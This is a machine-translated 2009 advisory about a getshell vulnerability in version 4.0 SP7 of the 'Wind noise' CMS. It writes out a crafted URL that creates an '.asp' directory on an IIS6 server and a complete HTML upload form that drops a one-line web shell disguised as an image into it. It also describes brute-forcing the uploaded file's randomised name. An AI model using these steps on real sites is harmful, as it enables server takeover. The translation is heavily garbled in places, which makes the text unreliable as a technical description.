Wind noise 4.0 SP7 getshell 0day-vulnerability warning-the black bar safety net

2009-07-13T00:00:00
ID MYHACK58:62200923850
Type myhack58
Reporter 佚名
Modified 2009-07-13T00:00:00

Description

Source:<http://www.0kee.com/read.php?tid-1041.html>

Found by: bloodsword, a bink, reproduced please disregard Affected versions:<=4.0 sp7, the previous version didn't go to see, estimation also can day. Use Conditions, opens a file upload function, iis6 environment.

Vulnerability Description: Create a directory somewhere, name the filter on the Mistakes that lead can bypass the filter the establishment of a. asp directory First register a account accesshttp://www.bbb.com/User/CommPages/FolderImageList.asp?f_UserNumber=06150583700&Type=AddFolder&Path=/userfiles/0 6 1 5 0 5 8 3 7 0 0/aaa. asp//&CurrPath=/userfiles/0 6 1 5 0 5 8 3 7 0 0 Which this 0 6 1 5 0 5 8 3 7 0 0 is your userid, the login direct can be seen, the establishment of a. asp directory

Because of the wind noise browse the directory where the filter., the So the establishment of the subdirectory into. The local structure forms:

<form name="FileForm" method="post" enctype="multipart/form-data" action="http://www.bbb.com/User/Commpages/UpFileSave.asp?Path=/userfiles/06150583700/aaa.asp"> <input type="hidden" name="AutoReName" value="2"><br> <input type="hidden" name="Path" value="/userfiles/0 6 1 5 0 5 8 3 7 0 0/aaa. asp"> <input type="file" size="2 0" name="File1"> <input type="hidden" name="FilesNum" value="1"> <input type="submit" id="BtnSubmit" name="Submit" value=" OK "> <input type="reset" id="ResetForm" name="Submit3" value=" refill "> </form>

A entrained in a word the picture up Disgusting place to, pass up file name is Date+Time+5-bit random number may be 4 bit 3 bit 2 bit 1 bit, anyway, a maximum of 5 bits, this I with bink studied the half-day, no

Way to see -_ -, with a limited have a violent guess access upload path functions, first in the normal directory Upload a file card about the local with the remote to the time difference, and then spread to. asp

Directory, The number of seconds of error control in less than 3 seconds, start running.~~then the Why why go,RP to cross the border while a few hours should be able to out the results-_-